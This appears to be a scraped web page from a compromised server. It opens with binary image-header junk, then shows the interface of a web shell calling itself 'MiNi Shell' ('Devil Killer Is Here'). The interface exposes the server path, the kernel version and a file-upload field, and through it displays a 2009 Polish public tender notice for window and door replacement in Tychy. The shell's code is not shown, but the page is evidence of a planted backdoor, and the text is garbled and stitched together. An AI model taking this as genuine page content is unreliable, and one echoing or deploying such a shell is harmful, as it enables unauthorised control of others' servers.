JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090507/72185-N-2009.html

<p class="kh_header"><b>Tychy: Wymiana stolarki okiennej i drzwiowej oraz witryn sklepowych w nieruchomościach
       administrowanych przez Rejon Obsługi Mieszkańców Nr IV i V</b><br>
<b>Numer ogłoszenia: 72185 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka  Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej i drzwiowej oraz witryn sklepowych w nieruchomościach
       administrowanych przez Rejon Obsługi Mieszkańców Nr IV i V.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane w zakresie wymiany stolarki okiennej 
       i drzwiowej oraz witryn sklepowych w nieruchomościach administrowanych przez 
       Rejon Obsługi Mieszkańców Nr IV i V

      Zamówienie składa się z 2 części, zwanych dalej zadaniami.


 ZADANIE Nr 1 -  Wymiana stolarki okiennej i drzwiowej w lokalach mieszkalnych 
                              oraz wymiana witryn sklepowych, okien i drzwi wejściowych 
                              w lokalu użytkowym, administrowanych przez  
                              Rejon Obsługi Mieszkańców Nr IV  
                             
 ZADANIE Nr 2 - Wymiana stolarki okiennej w lokalach mieszkalnych administrowanych 
                             przez Rejon Obsługi Mieszkańców Nr V
                          
Zakres robót obejmuje m.in.:

-	Z A D A N I E  Nr 1:

1. Wymianę stolarki okiennej: 
a)  okna jednoskrzydłowe - 13 szt. (10 szt. w lokalach mieszkalnych, 3 szt. w lokalu użytkowym)
b)  okna dwuskrzydłowe - 23 szt.
c)  okna trzyskrzydłowe - 8 szt.
d)  okna czteroskrzydłowe - 11 szt.

2. Wymianę zestawów balkonowych - 10 szt.

3. Wymianę drzwi balkonowych jednoskrzydłowych - 9 szt.

4. Wymianę drzwi zewnętrznych - 16 szt.
5. Wymianę witryn sklepowych - 6 szt.
6. Wymianę drzwi wejściowych w lokalu użytkowym - 1 szt.


Szczegółowy zakres robót określają przedmiary robót na Zadanie Nr 1.

Szczegółowe wymagania i parametry techniczne dotyczące stolarki okiennej, drzwiowej oraz witryn sklepowych określają załączniki do przedmiaru robót na Zadanie Nr 1. 
-		Z A D A N I E  Nr 2:

1. Wymianę stolarki okiennej: 
a)  okna jednoskrzydłowe - 10 szt. 
b)  okna dwuskrzydłowe - 58 szt.
c)  okna trzyskrzydłowe - 14 szt.
d)  okna czteroskrzydłowe - 3 szt.
2. Wymianę drzwi balkonowych jednoskrzydłowych - 11 szt.
3. Wymianę drzwi balkonowych dwuskrzydłowych - 6 szt.
4. Wymianę drzwi balkonowych trzyskrzydłowych - 1 szt.

Szczegółowy zakres robót określa przedmiar robót na Zadanie Nr 2.

Szczegółowe wymagania i parametry techniczne dotyczące stolarki okiennej określają załączniki 
do przedmiaru robót na Zadanie Nr 2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.41.00.00-4, 45.44.21.00-8, 45.42.11.31-1, 45.42.11.32-8, 45.11.12.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Informacja na temat wadium:    
           
            dla Zadania Nr 1: 4 500,00 zł  
            dla Zadania Nr 2: 3 900,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone na podstawie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych (Dz. U. z 2006 r., Nr 164, poz. 1163, 
Nr 170, poz. 1217 i Nr 227, poz. 1658, z 2007 r. Nr 64, poz. 427 i Nr 82, poz. 560 oraz z 2008 r. Nr 171, 
poz. 1058), tj.:  
-  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają 
   obowiązek posiadania takich uprawnień; 	
-  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami
   zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów 
   do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
-  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
 -  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 
    ustawy Pzp., 
    oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia.
                                
    Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy ubiegający się o zamówienie publiczne muszą złożyć oświadczenie, że spełniają warunki udziału w postępowaniu stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1÷ 4 Ustawy 
z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2006 r., Nr 164, poz. 1163, Nr 170, 
poz. 1217 i Nr 227, poz. 1658, z 2007 r. Nr 64, poz. 427 i Nr 82, poz. 560 oraz z 2008 r. Nr 171, poz. 1058),

 - wzór druku oświadczenia stanowi załącznik do niniejszej specyfikacji,
  (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oświadczenie 
   o spełnianiu warunków udziału w postępowaniu Wykonawcy składają łącznie)
   
  Ocena spełnienia ww. warunku zostanie dokonana zgodnie z formułą spełnia / nie spełnia.


A.	Sytuacja podmiotowa wykonawców, w tym wymogi dotyczące wpisu do rejestru   
zawodowego lub handlowego:

          Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:    
               
  1. W celu potwierdzenia, że Wykonawcy posiadają uprawnienia do wykonywania określonej 
       działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz, że 
      nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo  
      zamówień publicznych, Wykonawcy zobowiązani są przedłożyć następujące dokumenty:  

1)	aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do ewidencji 
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
do ewidencji działalności gospodarcze - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;    
   
2)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego  oddziału 
Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat 
       oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał 
       przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
       wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej     
       niż 3 miesiące przed upływem terminu składania ofert;

               
                -W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
       przedmiotowe dokumenty wymienione w punkcie 1) i 2) muszą być złożone dla każdego z nich.

2.  Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
     (Dz. U. Nr 87, poz. 605, z późn. zm.) w sprawie rodzajów dokumentów potwierdzających 
     spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich 
     może żądać Zamawiający od Wykonawcy:
1) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  
     Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1) i 2) - składa dokument lub 
     dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
     potwierdzające odpowiednio, że:  
     a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
     b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
          zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na 
          raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;  
2) jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce 
     zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie XII A.1. p.pkt. 1) i 2),  
     zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem,     
     właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
     gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma 
     siedzibę lub miejsce zamieszkania. 

     Ocena spełnienia ww. wymagań zostanie dokonana zgodnie z formułą spełnia / nie spełnia.

B.  Zdolność ekonomiczna i finansowa  
  
     Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:

    W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej    
    zapewniającej wykonanie zamówienia Zamawiający wymaga, aby Wykonawca wykazał, 
    że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
    o wartości ubezpieczenia nie mniejszej niż 150 000,00 zł - dot. Zadania Nr 1 i 2
    
    Do oferty należy załączyć:
    aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca 
    jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości  
    ubezpieczenia nie mniejszej niż 150 000,00 zł - dot. Zadania Nr 1 i 2

    Kwotę ubezpieczenia wyrażoną w  innej walucie niż PLN, Zamawiający przeliczy na PLN, przyjmując 
     do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez Narodowy Bank Polski.


    - W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli 
      Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z wykonawców.  

    Ocena spełnienia ww. wymagań zostanie dokonana zgodnie z formułą spełnia / nie spełnia.	

C. Zdolność techniczna

    Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:
    W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz, że 
    dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,  
     Zamawiający wymaga, aby wykonawca wykazał, że:


1) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia  
     publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał    
     z należytą starannością co najmniej dwie roboty odpowiadające swoim rodzajem i wartością  
     robotom budowlanym stanowiącym przedmiot zamówienia, należy wykazać co najmniej 
     d w i e  roboty zrealizowane  w ramach odrębnych umów o charakterze podobnym  
     do przedmiotu zamówienia, tj. roboty dotyczące wymiany stolarki o wartości każdej  
     z tych robót nie mniejszej niż 80 000,00 zł (brutto) - dot. Zadania Nr 1 i 2
    Do oferty należy załączyć:
  - wykaz wykonanych robót budowlanych odpowiadających swoim rodzajem i wartością
    robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz 
    daty i miejsca wykonania, należy wykazać, co najmniej d w i e  roboty zrealizowane w ramach  
    odrębnych umów o charakterze podobnym do przedmiotu zamówienia, tj. roboty dotyczące 
    wymiany stolarki o wartości każdej z tych robót nie mniejszej niż 80 000,00 zł (brutto), 
    oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane 
    należycie - dot. Zadania Nr 1 i 2

   Wykaz wykonanych robót budowlanych o charakterze podobnym do przedmiotu zamówienia należy sporządzić 
    wg wzoru druku stanowiącego załącznik do SIWZ. 
 - W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie lub co 
   najmniej jeden z Wykonawców

2)  dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonywaniu 
     zamówienia, w szczególności uprawnionymi do sprawowania samodzielnych funkcji technicznych
     w budownictwie w specjalnościach niezbędnych do projektowania i wykonania robót
     budowlanych art. 12 i 13 ustawy z dnia 7 lipca 1994 r. - Prawo Budowlane (Dz. U. z 2006r., 
     Nr 156, poz.118 z późn. zmianami), którzy są członkami Polskiej Izby Inżynierów Budownictwa 
     (art.6 ustawy z dnia 15 grudnia 2000r. samorządach zawodowych, architektów, inżynierów 
     budowlanych i Urbanistów, Dz. U. z 2001 r. Nr 5, poz. 42 z późn. zm.), tj.: osobą / osobami 
     posiadającymi uprawnienia budowlane w specjalności konstrukcyjno - budowlanej.
     
     Do oferty należy załączyć:

    - kserokopię uprawnień budowlanych w specjalności konstrukcyjno - budowlanej oraz aktualne  
      zaświadczenie wydane przez właściwą Izbę Inżynierów Budownictwa - dot. Zadania Nr 1 i 2

       (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie 
       lub co najmniej jeden z Wykonawców)
     
     Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - pok. 20 - cena 20 zł (brutto).
Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście lub złożą wniosek o jej
przekazanie za zaliczeniem pocztowym..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach, 
          ul. Filaretów 31 - SEKRETARIAT - pokój nr 15.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1 -  Wymiana stolarki okiennej i drzwiowej w lokalach mieszkalnych 
                              oraz wymiana witryn sklepowych, okien i drzwi wejściowych 
                              w lokalu użytkowym, administrowanych przez  
                              Rejon Obsługi Mieszkańców Nr IV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:

-	Z A D A N I E  Nr 1:

1. Wymianę stolarki okiennej: 
a)  okna jednoskrzydłowe - 13 szt. (10 szt. w lokalach mieszkalnych, 3 szt. w lokalu użytkowym)
b)  okna dwuskrzydłowe - 23 szt.
c)  okna trzyskrzydłowe - 8 szt.
d)  okna czteroskrzydłowe - 11 szt.

2. Wymianę zestawów balkonowych - 10 szt.

3. Wymianę drzwi balkonowych jednoskrzydłowych - 9 szt.

4. Wymianę drzwi zewnętrznych - 16 szt.
5. Wymianę witryn sklepowych - 6 szt.
6. Wymianę drzwi wejściowych w lokalu użytkowym - 1 szt.


Szczegółowy zakres robót określają przedmiary robót na Zadanie Nr 1.

Szczegółowe wymagania i parametry techniczne dotyczące stolarki okiennej, drzwiowej oraz witryn sklepowych określają załączniki do przedmiaru robót na Zadanie Nr 1..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.41.00.00-4, 45.44.21.00-8, 45.42.11.31-1, 45.42.11.32-8, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2 - Wymiana stolarki okiennej w lokalach mieszkalnych administrowanych 
                             przez Rejon Obsługi Mieszkańców Nr V.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:
Z A D A N I E  Nr 2:

1. Wymianę stolarki okiennej: 
a)  okna jednoskrzydłowe - 10 szt. 
b)  okna dwuskrzydłowe - 58 szt.
c)  okna trzyskrzydłowe - 14 szt.
d)  okna czteroskrzydłowe - 3 szt.
2. Wymianę drzwi balkonowych jednoskrzydłowych - 11 szt.
3. Wymianę drzwi balkonowych dwuskrzydłowych - 6 szt.
4. Wymianę drzwi balkonowych trzyskrzydłowych - 1 szt.

Szczegółowy zakres robót określa przedmiar robót na Zadanie Nr 2.

Szczegółowe wymagania i parametry techniczne dotyczące stolarki okiennej określają załączniki 
do przedmiaru robót na Zadanie Nr 2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.41.00.00-4, 45.44.21.00-8, 45.42.11.32-8, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com